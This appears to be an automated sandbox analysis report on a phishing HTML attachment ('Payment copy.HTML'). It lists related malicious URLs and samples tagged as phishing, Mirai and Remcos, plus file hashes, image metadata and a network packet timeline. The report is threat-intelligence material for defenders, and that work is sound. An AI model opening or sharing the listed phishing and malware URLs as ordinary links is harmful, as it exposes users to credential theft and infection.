                                            https://www.earthcam.net/refer/refer.php?h=1&t=ai&a=MjAyMTAzVExPTQ==&u=https://gamma.app/docs/Ikegami-Electronics-USA-Inc-7imknbprp42mt7n?mode=present#card-551p7iq4lgkr821Get hashmaliciousHTMLPhisherBrowse
                                            • 104.18.11.200
                                            http://www.lozoyalawaz.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                            • 104.17.24.14
                                            AfrihostZAxd.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 169.33.219.229
                                            xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                            • 169.71.211.183
                                            xd.m68k.elfGet hashmaliciousMiraiBrowse
                                            • 102.183.29.162
                                            xd.i686.elfGet hashmaliciousMiraiBrowse
                                            • 169.174.79.216
                                            xd.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 169.65.254.4
                                            xd.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 169.80.16.103
                                            xd.x86.elfGet hashmaliciousMiraiBrowse
                                            • 169.225.255.4
                                            xd.sh4.elfGet hashmaliciousMiraiBrowse
                                            • 192.143.250.212
                                            xd.powerpc-440fp.elfGet hashmaliciousMiraiBrowse
                                            • 169.107.8.154
                                            xd.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 169.108.199.4
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            28a2c9bd18a11de089ef85a160da29e4https://pl25946353.effectiveratecpm.comGet hashmaliciousUnknownBrowse
                                            • 204.79.197.222
                                            https://storage.googleapis.com/m030325nw/0203010214585.html#4dgBPD109344NHwX674ydbhwbcdjf377WZWJVQGWFRXHUDM187807FNMP18377G21Get hashmaliciousPhisherBrowse
                                            • 204.79.197.222
                                            https://up.culturaljourney.de/RwBmy/Get hashmaliciousHTMLPhisherBrowse
                                            • 204.79.197.222
                                            http://franoapas.co.inGet hashmaliciousUnknownBrowse
                                            • 204.79.197.222
                                            https://u.masdnfikjentriu.ru/dfgbwerfsd/dfgjher.htmlGet hashmaliciousUnknownBrowse
                                            • 204.79.197.222
                                            Statement 02-03-2025.xlsxGet hashmaliciousUnknownBrowse
                                            • 204.79.197.222
                                            Invoice Confirmation Subscription_2EZHMA9.htmGet hashmaliciousHTMLPhisherBrowse
                                            • 204.79.197.222
                                            http://www.bankmenia.frGet hashmaliciousUnknownBrowse
                                            • 204.79.197.222
                                            paste.ee_d_ktyPclYy.jsGet hashmaliciousRemcosBrowse
                                            • 204.79.197.222
                                            Revolt.batGet hashmaliciousHTMLPhisherBrowse
                                            • 204.79.197.222
                                            No context
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 1119x530, components 3
                                            Category:downloaded
                                            Size (bytes):42786
                                            Entropy (8bit):7.560196098084351
                                            Encrypted:false
                                            SSDEEP:384:QzfEtmgAxU+NoHZT04iHP04T19LfTHMhbRE26m1fkGhQOPIhEw6hNhyswQM7vG78:QzfEtjAmG6TxS9fsD7VfkGhRsEBwZN
                                            MD5:B078562CE3B7759C76E1F184734683DD
                                            SHA1:192BFFAE3279CFA47A7539B19D3811A18EBA1AEB
                                            SHA-256:8D2AE2E196083C37B7D3F39601ECEF4A19CDA7AE910F64E49E958C3BDA51A176
                                            SHA-512:445E4E8E5A8EEACBEB9FD931D7A282992E10645A9C9B0A69ABD83AA58A580F4846AB3CBD143C686B94AC242F38EA929C602719D7BFBD4C3932A93E54DFA0BA3B
                                            Malicious:false
                                            Reputation:low
                                            URL:https://i.ibb.co/nBXYTs4/wrong-details.jpg
                                            Preview:......JFIF.....`.`....."Exif..MM.*.........................C....................................................................C........................................................................._.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......./._t....[....{G.^/....i?.......}^.U"b7..Z<.e..(.*J...Z<.e..(.(.<.e...Z].......Z<.e..(.(.<.e...Zu.....M*.9.z..^k.......O..7rn.b.h.4p\...g..W,..U..PL...G..y...m...V.S.~._/..........b.hvV7O..TMg$........|..Y[..n.........fO.....Z<.e..).h..A.._....-&...P.y~.G......'..y~.FV.`....../.iv.n.....Z<.e..).].v....e...Z].......Z<.e
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                            Category:downloaded
                                            Size (bytes):7235
                                            Entropy (8bit):7.854530968163744
                                            Encrypted:false
                                            SSDEEP:96:XvtH6yH1xG+B9yulnhK/xXD8OktMUgwxqpTLEQhVYEnfxPqCsM8BeHnudkFvL:lHnHzb3yYhiZkCTXnnf9+R9dkFj
                                            MD5:40B917B7789A2852E23B074DF0EDC560
                                            SHA1:22CE76F00BC9D294E51409F31ACBBAC3921461E1
                                            SHA-256:AE2D45946C7B4F594006A87CF961ABA86CE880DE9BA334B03B9CDE9C39EC6FF3
                                            SHA-512:7D22377A197530B9E377FEE232C3F70CFF9201CF2E806240F20D94C08546C22C9FBC7406304F5E2E0A10B5C6D7C7B970BB8406FE3443EAE33EC7C22661950187
                                            Malicious:false
                                            Reputation:low
                                            URL:https://simgbb.com/images/favicon.png
                                            Preview:.PNG........IHDR...,...,.....y}.u....bKGD..............pHYs..........+......tIME.....8..Qj.....IDATx..y...}.==.....jOi%!....8.a..e.qA.q%&...@.8.q....Q.q...@......l....m.....a....v.BH......}..?.\.C........E...~.}..;~O[.y..!.(....B..E.!..!..".....B(,B..E.!..!.PX.....B(,B....!..!.PX..Ba.B(,B....!..".PX..Ba.B..E....!..".....Ba.B..E.!..!..".....Ba.B..E.!..!..".....B(,B..E.!..!.PX.....B(,B....!..!.PX..Ba.B(,B....!..".PX..Ba.B..E....!..".....Ba.B..E.!..!..".....Ba.B..E.!..!..".....B(,BHK.m..K.5l..a.. ....."..@..i.d..h...2../aw......-.<j7......-+.....W.}..H..G....,.&o.B(,.,....$.....s.K...Lc.H.64.!...!k..C0..k.\...W.'......'...I.*.sS. .E...Q..E_..W..s.e.u..`..P~../W.p.@..{eO......~r.#Y.i..z..Q..F..x...?G....g|..*.$...O....}~_...q..qH.ii...._.d~.......)..YPXuq..PY.&.....]x./O`.d......?....x...."^..bV..LUh!fAa..y1/.(....F|....p.......Gu|e}..F.....x.]B7.. S.;...r.G5...%.=...]!.,&./....z.>.....`.YPX...F..# .?.*.._N.k..k>.....UG..c+..r.~.7.....k%7.......
                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                            File Type:PNG image data, 300 x 300, 8-bit/color RGBA, non-interlaced
                                            Category:dropped
                                            Size (bytes):7235
                                            Entropy (8bit):7.854530968163744
                                            Encrypted:false
                                            SSDEEP:96:XvtH6yH1xG+B9yulnhK/xXD8OktMUgwxqpTLEQhVYEnfxPqCsM8BeHnudkFvL:lHnHzb3yYhiZkCTXnnf9+R9dkFj
                                            MD5:40B917B7789A2852E23B074DF0EDC560
                                            SHA1:22CE76F00BC9D294E51409F31ACBBAC3921461E1
                                            SHA-256:AE2D45946C7B4F594006A87CF961ABA86CE880DE9BA334B03B9CDE9C39EC6FF3
                                            SHA-512:7D22377A197530B9E377FEE232C3F70CFF9201CF2E806240F20D94C08546C22C9FBC7406304F5E2E0A10B5C6D7C7B970BB8406FE3443EAE33EC7C22661950187
                                            Malicious:false
                                            Reputation:low
                                            Preview:.PNG........IHDR...,...,.....y}.u....bKGD..............pHYs..........+......tIME.....8..Qj.....IDATx..y...}.==.....jOi%!....8.a..e.qA.q%&...@.8.q....Q.q...@......l....m.....a....v.BH......}..?.\.C........E...~.}..;~O[.y..!.(....B..E.!..!..".....B(,B..E.!..!.PX.....B(,B....!..!.PX..Ba.B(,B....!..".PX..Ba.B..E....!..".....Ba.B..E.!..!..".....Ba.B..E.!..!..".....B(,B..E.!..!.PX.....B(,B....!..!.PX..Ba.B(,B....!..".PX..Ba.B..E....!..".....Ba.B..E.!..!..".....Ba.B..E.!..!..".....B(,BHK.m..K.5l..a.. ....."..@..i.d..h...2../aw......-.<j7......-+.....W.}..H..G....,.&o.B(,.,....$.....s.K...Lc.H.64.!...!k..C0..k.\...W.'......'...I.*.sS. .E...Q..E_..W..s.e.u..`..P~../W.p.@..{eO......~r.#Y.i..z..Q..F..x...?G....g|..*.$...O....}~_...q..qH.ii...._.d~.......)..YPXuq..PY.&.....]x./O`.d......?....x...."^..bV..LUh!fAa..y1/.(....F|....p.......Gu|e}..F.....x.]B7.. S.;...r.G5...%.=...]!.,&./....z.>.....`.YPX...F..# .?.*.._N.k..k>.....UG..c+..r.~.7.....k%7.......
                                            File type:HTML document, ASCII text, with very long lines (17642), with CRLF line terminators
                                            Entropy (8bit):6.051166653033828
                                            TrID:
                                              File name:Payment copy.HTML
                                              File size:18'964 bytes
                                              MD5:a84eb8ccb518dc96f1d4f0f2f53556df
                                              SHA1:b0f17a8f02660f37f12f8c70c3cb45411a40eb5d
                                              SHA256:d73a1e132450df375107353e0ccfa8de5916a645252a807ba2f3f1f70d2afbaa
                                              SHA512:dbba2cb51c1bdcafb0bf074dbe1d3d38f064a55dd17a9854b012202f9d7cc7c81795a16e7d4981c5234f795da1847109146245ea27a35be2bfbb5cef600fc771
                                              SSDEEP:384:fUwPSh3Uds6y8fV/D8O9BF+DvX+zIRrEQCjjiJDMVYpJI89Ulp:fUww3PNi/F+izkEQCjGlSYpG+Ulp
                                              TLSH:0D828C3DF7FAB48D16BD4A64E9BCEC206E8FBC1754D04B6329519368ADC90824B1C3D8
                                              File Content Preview: .. .. ...<title>REMITTANCE</title> ...<style> ....body { .....background-image: url('data:image/jpeg;base64,/9j/4QBWRXhpZgAATU0AKgAAAAgABAESAAMAAAABAAEAAAEaAAUAAAABAAAAPgEbAAUAAAABAAAARgEoAAMAAAABAAIAAAAAAAAAAACQAAAAAQAAAJAAAAAB/+AAEEpGSUYAAQEBAJAA
                                              Icon Hash:1270ce868a8686b8

                                              Download Network PCAP: filteredfull

                                              • Total Packets: 147
                                              • 443 (HTTPS)
                                              • 80 (HTTP)
                                              • 53 (DNS)
                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 3, 2025 00:53:46.896480083 CEST4968180192.168.2.42.17.190.73
                                              Apr 3, 2025 00:53:50.740700006 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:53:51.052710056 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:53:51.654256105 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:53:52.864432096 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:53:55.272049904 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:53:56.505402088 CEST4968180192.168.2.42.17.190.73
                                              Apr 3, 2025 00:53:56.944051981 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:56.944097996 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:53:56.944185972 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:56.944338083 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:56.944346905 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:53:57.159554005 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:53:57.159615040 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:57.160753965 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:57.160764933 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:53:57.160988092 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:53:57.208502054 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:53:59.511043072 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:53:59.822552919 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:00.085233927 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:54:00.431118011 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:01.645807028 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:04.052630901 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:05.542653084 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.542653084 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.542741060 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.646497011 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.646514893 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.646526098 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.647381067 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.647403002 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.647927999 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.649743080 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.649780035 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.650058031 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.663486004 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.669523954 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.763254881 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.769298077 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.771449089 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.771514893 CEST44349709131.253.33.254192.168.2.4
                                              Apr 3, 2025 00:54:05.771539927 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.771636009 CEST49709443192.168.2.4131.253.33.254
                                              Apr 3, 2025 00:54:05.774250984 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:05.774276018 CEST49737443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:05.774348021 CEST44349737204.79.197.222192.168.2.4
                                              Apr 3, 2025 00:54:05.777749062 CEST49737443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:05.777749062 CEST49737443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:05.777817011 CEST44349737204.79.197.222192.168.2.4
                                              Apr 3, 2025 00:54:06.083466053 CEST44349737204.79.197.222192.168.2.4
                                              Apr 3, 2025 00:54:06.083549023 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:06.083674908 CEST49737443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:06.692847013 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:07.149332047 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:07.149470091 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:07.149532080 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:07.896001101 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:08.476457119 CEST49733443192.168.2.4142.250.80.4
                                              Apr 3, 2025 00:54:08.476527929 CEST44349733142.250.80.4192.168.2.4
                                              Apr 3, 2025 00:54:08.880064011 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:09.700824022 CEST49671443192.168.2.4204.79.197.203
                                              Apr 3, 2025 00:54:10.310947895 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:14.200872898 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.200925112 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:14.201023102 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.201455116 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.201471090 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.201484919 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:14.201491117 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:14.204021931 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.204021931 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:14.204055071 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.115755081 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:15.213385105 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.213397980 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.213473082 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:15.213541031 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:15.218003988 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:15.218019009 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.218379021 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.218879938 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:15.218899965 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.219170094 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.219629049 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:15.260277033 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:15.268021107 CEST49742443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:18.262020111 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:18.262217999 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:18.262419939 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:18.262490034 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:18.262511969 CEST44349743154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:18.262525082 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:18.262749910 CEST49743443192.168.2.4154.0.165.249
                                              Apr 3, 2025 00:54:18.367240906 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.367301941 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.367429972 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.367563009 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.367573977 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.491830111 CEST49678443192.168.2.420.189.173.27
                                              Apr 3, 2025 00:54:18.571852922 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.571955919 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.572928905 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.572959900 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.573355913 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.573642015 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.616286039 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.741462946 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.741514921 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.741729975 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.741764069 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.743294954 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.747812986 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.752293110 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.758368969 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.760248899 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.760250092 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.760276079 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.769007921 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.785273075 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.786740065 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.834378958 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.834875107 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.847392082 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.847479105 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.853930950 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.857028008 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.867026091 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.869539022 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.878832102 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.878948927 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.884848118 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.886259079 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.891169071 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.891266108 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.891292095 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.891330957 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.891415119 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.891654015 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.891693115 CEST44349744207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.891722918 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.893021107 CEST49744443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.917323112 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.917377949 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:18.918207884 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.918606043 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:18.918626070 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.106777906 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.107018948 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:19.107057095 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.107172012 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:19.107178926 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.293463945 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.293549061 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.299916983 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:19.300389051 CEST49746443192.168.2.4207.174.26.219
                                              Apr 3, 2025 00:54:19.300407887 CEST44349746207.174.26.219192.168.2.4
                                              Apr 3, 2025 00:54:19.404031038 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.404088974 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.404175043 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.404323101 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.404337883 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.615190029 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.618542910 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.628566027 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.628590107 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.628968000 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.629319906 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.672271013 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.857779026 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.857851982 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.857894897 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.857922077 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.857934952 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.857949018 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.858028889 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.858091116 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.859237909 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.860694885 CEST49748443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.860713005 CEST44349748172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.968843937 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.968888044 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:19.968950033 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.969090939 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:19.969095945 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.176335096 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.176407099 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.176825047 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.176831007 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.177146912 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.177414894 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.220295906 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.417870045 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418003082 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418090105 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418169022 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418183088 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.418201923 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418229103 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.418313026 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418369055 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.418376923 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418441057 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:20.418549061 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.419051886 CEST49749443192.168.2.4172.67.131.251
                                              Apr 3, 2025 00:54:20.419064045 CEST44349749172.67.131.251192.168.2.4
                                              Apr 3, 2025 00:54:24.724384069 CEST49680443192.168.2.4204.79.197.222
                                              Apr 3, 2025 00:54:38.927380085 CEST4971580192.168.2.4142.251.41.3
                                              Apr 3, 2025 00:54:38.927509069 CEST4971680192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:54:38.927612066 CEST4971880192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:54:39.018539906 CEST8049715142.251.41.3192.168.2.4
                                              Apr 3, 2025 00:54:39.018619061 CEST4971580192.168.2.4142.251.41.3
                                              Apr 3, 2025 00:54:39.018712997 CEST8049718199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:54:39.018745899 CEST8049716199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:54:39.018794060 CEST8049716199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:54:39.018843889 CEST4971680192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:54:39.019861937 CEST8049718199.232.214.172192.168.2.4
                                              Apr 3, 2025 00:54:39.020009995 CEST4971880192.168.2.4199.232.214.172
                                              Apr 3, 2025 00:54:39.102166891 CEST49717443192.168.2.4104.70.121.145
                                              Apr 3, 2025 00:54:44.861557007 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:44.861704111 CEST44349742154.0.165.249192.168.2.4
                                              Apr 3, 2025 00:54:44.861876011 CEST49742443192.168.2.4154.0.165.249
